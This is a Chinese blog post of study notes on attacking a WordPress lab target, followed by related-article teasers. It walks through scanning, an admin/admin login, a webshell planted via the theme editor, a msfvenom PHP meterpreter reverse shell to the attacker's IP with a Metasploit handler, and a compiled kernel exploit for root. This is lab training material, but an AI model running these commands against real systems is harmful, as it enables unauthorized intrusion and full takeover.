渗透靶机(CMS漏洞)

最新推荐文章于 2025-06-19 17:32:27 发布

clusters of stars

最新推荐文章于 2025-06-19 17:32:27 发布

阅读量3.2k

点赞数 2

CC 4.0 BY-SA版权

分类专栏：渗透靶机学习笔记文章标签：安全 web安全

本文链接：https://blog.youkuaiyun.com/weixin_48876267/article/details/120889738

学习笔记同时被 2 个专栏收录

10 篇文章

订阅专栏

渗透靶机

3 篇文章

订阅专栏

高难度渗透靶机

1、扫描靶机信息

nmap -sV 192.168.222.130

nmap -A -v -T4 192.168.222.130

nikto -host 192.168.222.130				//扫描网站目录

dirb http://192.168.222.130				//扫描关键信息

由于wordpress文件，判断是否是某个CMS,是否具有可以直接利用的漏洞;
wpscan -url url -enumerate at -enumerate ap --enumerate u
wordpress基于php的CMS管理系统
wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u

对网页进行弱密码测试

1、192.168.222.128/wordpress/login.php

弱密码
admin 	admin登录成功

2、点击Appearance > Editor > 编辑可以上传的webshell

使用msfvenom生成可以接受到msf的回弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php

上传成功之后访问该404网页

在msf中接受回弹结果

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp			//设置payload
set lhost 192.168.222.128					   //设置回弹攻击机的IP地址
set lport 4444								  //设置回弹的端口

查看该系统的内核版本，进行内核渗透

sysinfo			查看系统信息
利用searchsploit Linux ubuntu 4.4.0		查看内核版本漏洞的exp

使用这个exp

gcc 41458.c -o shell		gcc编译完之后输出shell
在meterpreter上传刚才编译好的文件
upload shell

chmod 777 shell				//给与其最高权限
./shell					    //运行该程序
获得root权限

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

clusters of stars

关注关注

2
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

帝国CMS漏洞get webshell权限漏洞详情与修复

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

12-05

1179

帝国CMS漏洞get webshell权限漏洞详情与修复。最近我们SINE安全在对帝国CMS系统进行代码安全审计的时候，发现该系统存在网站漏洞，受影响的版本是EmpireCMS V7.5，从帝国官方网站下载到本地，我们人工对其代码进行详细的漏洞检测与安全代码分析。共计发现三个高危漏洞，都是在网站的后台管理页面上的功能发现的。该漏洞的产生，最根源的问题是没有对get,post提交方式进行严格的安全效验与过滤，导致可以插入恶意代码到后端服务器中去处理，导致漏洞的发生。

jarbas 靶机渗透(cms 渗透)

m0_63416413的博客

08-29

918

nmap主机发现，扫端口，漏洞脚本扫描发现80端口部署了jakins发现8080端口似乎是一个管理端登录窗口爆破80端口的目录，指定后缀为html,php找到几个账号和密码，在线md5解密，尝试登录后台使用jakins的特性，创建 item 时可写 shell 或 batch, 配合之前的nmap扫描可知服务器为linux系统，故写入 shell 脚本kali 监听4444 端口，build 这个 item 拿到一个 shell，这个shell为 /bash/false ，应当提权。

参与评论您还未登录，请先登录后发表或查看评论

sickos 靶机渗透(wolf cms 渗透，squid 代理)

m0_63416413的博客

08-30

1350

主机发现阶段的tcp扫描开放了22, 3128, 8080, 但是8080关闭3128开放了squid服务，起代理作用用3128做代理，访问8080，看到web页面使用dirb -p 代理，爆破8080的目录发现8080的robots文件，找到/wolfcms目录是一个wolfcms的后台路径，/?搜索默认密码，admin admin观察，发现可执行php，反弹个shell拿到一个初级shell, 用户为www-data。

EmpireCMS4.5 渗透测试及靶场搭建（漏洞复现）

Continuejww的博客

08-30

3150

成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。

渗透测试中新手必练的15个靶场，（非常详细）零基础入门到精通，收藏这篇就够了

最新发布

Libra1313的博客

06-19

1005

相信很多小伙伴们在学习渗透测试的时候，不知道如何开始，那么这下面15个靶场对你的学习将会有很大的帮助！

My-cmsms 靶机

wanjia01的博客

11-08

1082

Vulhub的靶机my-cmsms的渗透测试过程。链接：https://pan.baidu.com/s/1bbVQ8okhsPUMNJJRMW6xuQ?pwd=yb1w 提取码：yb1w 靶机环境自取

CMS漏洞靶场攻略

yiqiqukanrichu的博客

12-30

971

傻瓜式安装。

在靶机搭建cms管理系统，描述搭建过程。

2401_83124412的博客

06-28

694

2. 编辑我的电脑右键点击新建环境变量，复制mysql的路径添加到环境变量中：D:\phpStudy\PHPTutorial\MySQL。3. 打开WIN+R打开命令提示符登入mysql，先切换到D:\phpStudy\PHPTutorial\MySQL\bin。使用在win7浏览器中输入win2003的地址---URL:192.168.100.130/cms。5. 导入数据库： source D:\cms(实训)\cms\install.sql。至此，cms管理系统就搭建好啦。6. 修改php.ini。

Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)

qq_45722813的博客

12-07

3196

Vulnhub靶场渗透测试DC-3 靶机下载地址：https://www.five86.com/dc-3.html 攻击机为kali2021，IP地址：192.168.172.131 将靶机导入到VMware，设置网络模式为NAT模式，开启靶机虚拟机在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址，命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP，可能是靶机网络设置问题，参考文章：https://editor.youkuaiyun.com/md/?artic

cms.rar，靶机的源码

07-03

在这个名为“cms.rar”的压缩包中，我们很可能是得到了一个靶机的源码，靶机在网络安全领域中扮演着重要的角色，用于模拟实际系统，帮助测试人员进行安全漏洞的发现和修复。 1. **靶机的概念与用途**：靶机是网络...

某cms网站渗透的过程

MachineGunJoe666

05-06

1290

1.通过fofa查询出该网站的后台，进去发现很像某cms，利用御剑的cms识别工具识别出对方是phpcms的站。 2.通过百度查询得出：该phpcms站点可能存在文件上传，敏感信息泄露，sql报错注入。我只验证出来了sql报错注入。 3.把这几个链接转发到burp的重放器： 1.1： http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1[1] 获取Set-Cookie: aOqWU_siteid用.

cmsPoc：CMS渗透测试框架-CMS Exploit Framework

02-05

注意项目正在中：注意：2.0版本的poc库尚未更新相应接口，无法调用。若需使用，建议先使用1.0版本。 cmsPoc 1.0 要求 python2.7 适用于Linux，Windows 用法 usage: cmspoc.py [-h] -t TYPE -s SCRIPT -u URL optional arguments: -h, --help show this help message and exit -t TYPE, --type TYPE e.g.,phpcms -s SCRIPT, --script SCRIPT

一些cms渗透的思路

hibari_18的博客

07-12

7679

一些cms渗透的思路

渗透之CMS

追风筝的孩子

09-07

3158

CMS，即 Content Management System ，中文全称是“网站内容管理系统”。网站内容管理系统具有许多基于模板的优秀设计，可以加快网站开发的速度和减少开发的成本。网站内容管理系统的功能并不只限于文本处理，它也可以处理图片、Flash动画、声像流、图像甚至电子邮件档案。网站内容管理系统其实是一个很广泛的称呼，从一般的博客程序，新闻发布程序，到综合性的网站管理程序都可...

红队笔记8-CTF5打靶流程-CMS漏洞-多用户信息泄露（vulnhub）

qq_63442530的博客

03-26

1248

这次的靶场难度不高，但很需要经验，在提权过程中，把能有提权到尝试都去探索了一遍，发现都没有利用点，1.主机发现和端口扫描：端口扫描，发现存活了大量端口，其他很多端口不熟悉，依旧选择从80端口入手2.80端口：通过观察页面，发现是由NanoCMS搭建，存在后台登录窗口，根据想登录后台getshell的思路，寻找密码，最后在通过浏览器搜索到了NanoCMS的凭据泄露漏洞，成功登录后台。

常见CMS漏洞（WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin）

2301_76631050的博客

08-04

2296

利⽤mysql⽇志⽂件写shell，这个⽇志可以在mysql⾥改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)

web渗透cms靶场

weixin_49794194的博客

01-10

927

主页测试了很多地方漏洞还是比较多的，可能是系统比较老的原因，但是我们的目标主要是文件上传拿下webshell，这里我们找到了会员注册然后成功跳转会员中心，发现可以插入新的新闻，或者上传个人头像这里首先哥斯拉的php后缀改为jpg，因为这个靶场是文件类型验证，burp抓传数据包将第21行的filename jpg更改为php上传，上传之后f12查看网页源代码看看文件被插去哪里了这里看到data有会员资料上传的php应该是上传之后重命名，我们直接打开哥斯拉连接连接成功ipconfig，渗渗透靶场结束

靶机渗透练习11-VulnCMS (三个国外著名cms)

Force~

04-03

6611

靶机地址： https://www.vulnhub.com/entry/vulncms-1,710/ 1、主机探活 arp-scan -I eth0 -l （指定网卡扫）扫描局域网所有设备（所有设备IP、MAC地址、制造商信息） masscan 192.168.111.0/24 -p 80,22 （masscan 扫描的网段 -p 扫描端口号） netdiscover -i eth0 -r 192.168.184.0/24 （netdiscover -i 网卡-r 网段） nmap -sn 192..

某CMS漏洞总结

include_voidmain的博客

08-01

5143

某CMS漏洞总结

CMS靶机源码深入剖析

靶机的目标是模拟真实环境中的攻击目标，让安全研究人员或安全爱好者可以在其上进行渗透测试、漏洞挖掘等实验，以此来提高个人的网络安全技能或验证安全防护措施的有效性。靶机可以是虚拟机或者实际的硬件设备，它们...